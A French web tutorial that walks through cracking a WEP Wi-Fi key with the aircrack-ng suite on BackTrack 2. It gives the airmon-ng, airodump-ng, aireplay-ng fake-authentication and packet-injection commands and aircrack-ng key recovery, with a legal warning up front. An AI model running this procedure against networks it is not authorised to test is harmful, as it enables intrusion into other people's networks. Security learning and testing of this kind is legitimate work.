1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118
|
<img src="../images/titres/tutos_preambule.jpg" width="670" height="62" alt="titre preambule">
<p>Avant de se lancer dans la sécurité réseau :</p>
<ul style="list-style-image:url(../images/autre/fleche_rouge.gif) ">
<li>Il faut avoir quelques connaissances en informatique.</li>
<li>Posséder un Live-CD de Linux (<a href="../Documents/Telechargements/bt2final.iso">téléchargeable ici</a>).</li>
<li>Etre patient !</li>
</ul>
<p class="warning">Il est formellement interdit de s'introduire dans un réseau sans en avoir eu <u>l'autorisation du propriétaire</u>. <br>
<br>
Ce tutoriel a pour unique but de sensibiliser les gens au piratage. Le piratage est un fait grave. Des <u>peines</u> et <u>amendes</u> pourraient être encourues aux petits malins qui utiliseraient ce tutoriel à des fins malhonnêtes.<br>
<br>
Toutefois vous avez parfaitement le droit de tester la sécurité de <u>votre</u> réseau et uniquement votre réseau ! Zonegeeks décline toutes responsabilités.</p>
<br>
<img src="../images/titres/tutos_crack_injection.jpg" width="670" height="62" alt="titre injection packets">
<p>L'attaque par injection de packets a pour but de stimuler la production d'ivs nécessaire au craquage de votre clé wep. Cette attaque est très efficace lorsqu'une station connectée génère des arp. </p>
<p>Une station connectée (et valide) est pré requis pour tenter l'attaque. Cependant l'attaque sans station est possible mais le taux de réussite est relativement faible.</p>
<p><strong>Voir également :</strong></p>
<ul style="list-style-image:url(../images/autre/fleche_rouge.gif) ">
<li><a href="tutos-crack-wep-chopchop.php">Crack clé wep par l'attaque Chopchop</a></li>
<li><a href="tutos-crack-wpa.php">Crack clé wpa par Brute Force</a></li>
</ul>
<img src="../images/sous_titres/tutos_prerequis.jpg" width="670" height="52" alt="pre requis">
<p>Pour commencer, il faut posséder un Live-CD (CD Bootable) de Linux. Vous pouvez <a href="../Documents/Telechargements/bt2final.iso">télécharger Backtrack 2</a> (dernière version) sur ce site.</p>
<p>Vous devez ensuite insérer le CD dans le lecteur de manière à booter sur le CD (vous devez peut-être changer la séquence de boot dans le BIOS).</p>
<p>Attendez ensuite quelques minutes et vous devriez voir cet écran de démarrage :</p>
<p><strong>Login</strong> : root<br>
<strong>Pass</strong> : toor</p>
<p>Une fois logué, entrer la commande <span class="instruction">startx</span> (attention clavier qzerty donc il faut écrire stqrtx).</p>
<div align="center"><img src="../images/min/crack_wep/accueil_bt.jpg" alt="accueil bt" width="422" height="273" border="0"> </div>
<p>Une fois le bureau chargé, changer la langue en cliquant sur l'icône en bas à droite du bureau.</p>
<div align="center"><a href="../images/max/crack_wep/langue.jpg"><img src="../images/min/crack_wep/langue.jpg" alt="bt langue" width="604" height="453" border="0"></a> </div>
<p>Ouvrez une console (icône en bas à gauche de couleur noire) et c'est parti !</p>
<img src="../images/sous_titres/tutos_arimon.jpg" width="670" height="52" alt="airmon">
<p>Lancez airmon-ng :</p>
<p class="syntaxe">airmon-ng start INTERFACE_WIFI<br>
Pour connaitre son interface wifi, faites seulement airmon-ng. </p>
<div align="center"><a href="../images/max/crack_wep/airmon.jpg"><img src="../images/min/crack_wep/airmon.jpg" alt="airmon" width="604" height="207" border="0"></a></div>
<br>
<img src="../images/sous_titres/tutos_airodump.jpg" width="670" height="52" alt="airodump">
<p>Lancez airodump-ng :</p>
<p class="syntaxe">airodump-ng --write Nom_Fichier_Sortie --channel Canal --encrypt Type_De_Securite INTERFACE_WIFI <br>
<br>
-- write : Nom du fichier cap de sortie. Obligatoire<br>
-- channel : Cannal où se situe l'ap (entre 1 et 13). Facultatif.<br>
-- encrypt : Filtre en fonction de la sécutité du réseau (wpa, wep, opn). Faculatatif.<br>
-- bssid : Filtre en fonction d'une adresse MAC d'un réseau. Facultatif. </p>
<div align="center"><a href="../images/max/crack_wep/airodump.jpg"><img src="../images/min/crack_wep/airodump.jpg" alt="airodump" width="604" height="58" border="0"></a></div>
<p>L'ap visé s'appelle test_wep. </p>
<div align="center"><a href="../images/max/crack_wep/airodump_scan.jpg"><img src="../images/min/crack_wep/airodump_scan.jpg" alt="scan airodump" width="604" height="164" border="0"></a></div>
<br>
<img src="../images/sous_titres/tutos_airplay.jpg" width="670" height="52" alt="aireplay">
<p>Passons maintenant à la fake authentification.</p>
<p class="syntaxe">aireplay-ng -1 0 -e Nom_Du_Reseau -a Bssid_Du_Reseau -h Bssid_De_La_Station INTERFACE WIFI<br>
<br>
-1 0 : Indique une fake authentification avec un timeout de 0ms. Obligatoire.<br>
-e : Nom du réseau (colonne ESSID). Obligatoire.<br>
-a : Adresse MAC du réseau (colonne BSSID). Obligatoire.<br>
-h : Adresse MAC de la station (colonne STATION). Obligatoire.</p>
<div align="center"><a href="../images/max/crack_wep/aireplay_fake.jpg"><img src="../images/min/crack_wep/aireplay_fake.jpg" alt="aireplay fake authentification" width="604" height="166" border="0"></a></div>
<p>Une fois l'association réussie, on passe à l'injection de packets.</p>
<p class="syntaxe">aireplay -3 -e Nom_Du_Reseau -b Bssid_Du_Reseau -h Bssid_De_La_Station -x Vitesse_Injection -r Fichier_Cap_A_Utiliser INTERFACE_WIFI <br>
<br>
-3 : Indique qu'il s'agit d'une injection de packets. Obligatoire.<br>
-e : Nom du réseau. Facultatif.<br>
-b : Adresse MAC du réseau (colonne BSSID). Obligatoire.<br>
-h : Adresse MAC de la station (colonne STATION). Obligatoire.<br>
-x : Vitesse d'injection des packets (entre 100 et 1000). Facultatif.<br>
-r : Fichier cap à se servir pour l'injection lors de l'attaque ChopChop par exemple. Facultatif. </p>
<div align="center"><a href="../images/max/crack_wep/aireplay_injection.jpg"><img src="../images/min/crack_wep/aireplay_injection.jpg" alt="aireplay injection packets" width="604" height="248" border="0"></a></div>
<p>Il faut attendre quelques minutes pour que les arp augmentent ainsi que les ivs mais si vous êtes loin de l'ap, cela peut prendre plusieurs heures. </p>
<p>Normalement si tout se passe bien, les arp augmentent ainsi que les ivs. </p>
<div align="center"><a href="../images/max/crack_wep/scan_injection.jpg"><img src="../images/min/crack_wep/scan_injection.jpg" alt="production arp et ivs" width="604" height="429" border="0"></a> </div>
<br>
<div align="center"><a href="../images/max/crack_wep/scan_injection3.jpg"><img src="../images/min/crack_wep/scan_injection3.jpg" alt="production suite" width="604" height="429" border="0"></a></div>
<p>Il faut en théorie 300 000 ivs pour cracker une clé de 64 bits, 1 000 000 pour une clé de 128 bits et 3 000 000 pour une clé de 256 bits. </p>
<img src="../images/sous_titres/tutos_aircrack.jpg" width="670" height="52" alt="aircrack">
<p>Lancez aircrack-ng : </p>
<p class="syntaxe">aircrack-ng -x -0 -n Taille_Cle_Wep Nom_Du_Fichier_Cap_De_Aerodump <br>
<br>
-x : Attaque classique pour casser la clé. Obligatoire<br>
-0 : Colorie l'ecran en vert à la matrix ! Facultatif.<br>
-n : Si vous connaissez la taille de la clé wep (64, 128 ou 256). Facultatif.<br>
-f : Fudge factor (entre 2 et 12). Facultatif.<br>
-k : Désactive certaines attaques de Korek (entre 1 et 17). Facultatif. <br>
*.cap : Charge tous les fichiers cap (pratique si vous avez oublier le nom du fichier). Obligatoire. </p>
<div align="center"><a href="../images/max/crack_wep/aircrack_normal.jpg"><img src="../images/min/crack_wep/aircrack_normal.jpg" alt="aircrack attaque normale" width="604" height="238" border="0"></a></div>
<p>Admirez les chiffres hexadécimaux qui défilent à la matrix ! Vous devriez voir votre clé wep au bout de quelques minutes si vous avez suffisamment d'ivs... </p>
<div align="center"><a href="../images/max/crack_wep/aircrack_normal_cle.jpg"><img src="../images/min/crack_wep/aircrack_normal_cle.jpg" alt="aircrack resultat attaque normale" width="604" height="465" border="0"></a></div>
<p>Cependant, un nouvel algorithme a vu le jour il y a quelques mois. Il s'agit de aircrack-ptw disponible en natif seulement avec les distributions Backtrack 2.0 et Wifiway 0.6 </p>
<p>Une mise à jour de aircrack-ng permet d'avoir ce nouvel algorithme redoutable. (<a href="tutos-crack-wep-aircrack.php">voir comment installer la mise à jour</a>). </p>
<p>La syntaxe est quasi identique : </p>
<p class="syntaxe">aircrack-ng -z -0 -n Taille_Cle_Wep Nom_Du_Fichier_Cap_De_Aerodump <br>
<br>
-z : Nouvel algorithme de crackage (ptw). Obligatoire<br>
-0 : Colorie l'ecran en vert à la matrix ! Facultatif.<br>
-n : Si vous connaissez la taille de la clé wep (64, 128 ou 256). Facultatif.<br>
-f : Fudge factor (entre 2 et 12). Facultatif.<br>
-k : Désactive certaines attaques de Korek (entre 1 et 17). Facultatif. <br>
*.cap : Charge tous les fichiers cap (pratique si vous avez oublier le nom du fichier). Obligatoire. </p>
<div align="center"><a href="../images/min/crack_wep/aircrack_ptw.jpg"><img src="../images/min/crack_wep/aircrack_ptw.jpg" alt="aircrack attaque ptw" width="604" height="251" border="0"></a></div>
<p>On remplace le « x » par « z ».</p>
<p>Avec cet algorithme, on peut cracker une clé wep avec <strong>seulement 40 000 ivs</strong>. La preuve en image : </p>
<div align="center"><a href="../images/max/crack_wep/aircrack_ptw_cle.jpg"><img src="../images/min/crack_wep/aircrack_ptw_cle.jpg" alt="aircrack attaque ptw resultat" width="604" height="465" border="0"></a></div>
<p>En cas d'échec, vous pouvez modifier le fudge factor (-f) entre 2 et 10. </p>
<div align="center"><img src="../images/min/crack_wep/aircrack_fudge.jpg" alt="aircrack fudge" width="604" height="56" border="0"></div>
<p>Vous pouvez aussi désactiver un des attaques de KOREK (-k). Par défaut, aircrack utilise 17 attaques ! </p>
<div align="center"><img src="../images/min/crack_wep/aircrack_korek.jpg" alt="aircrack korek" width="604" height="56" border="0"></div>
<p>Et si vous le souhaitez, vous pouvez fusionner les commandes : </p>
<div align="center"><img src="../images/min/crack_wep/aicrack_fudge_korek.jpg" alt="aircrack fudge korek" name="az" width="604" height="56" border="0"></div>
<p>Si cela ne marche toujours pas, </p>
<ul style="list-style-image:url(../images/autre/fleche_rouge.gif) ">
<li>Le fichier de capture (.cap) est corrompu. </li>
<li>Vous n'avez pas assez d'ivs. </li>
<li>Le réseau a changé de nom, clé wep ou adressage. </li>
<li>Vous êtes poissard !</li>
</ul>
<p class="warning">Après ce tutoriel, je vous conseille vivement de passer au WPA ... </p> |
Partager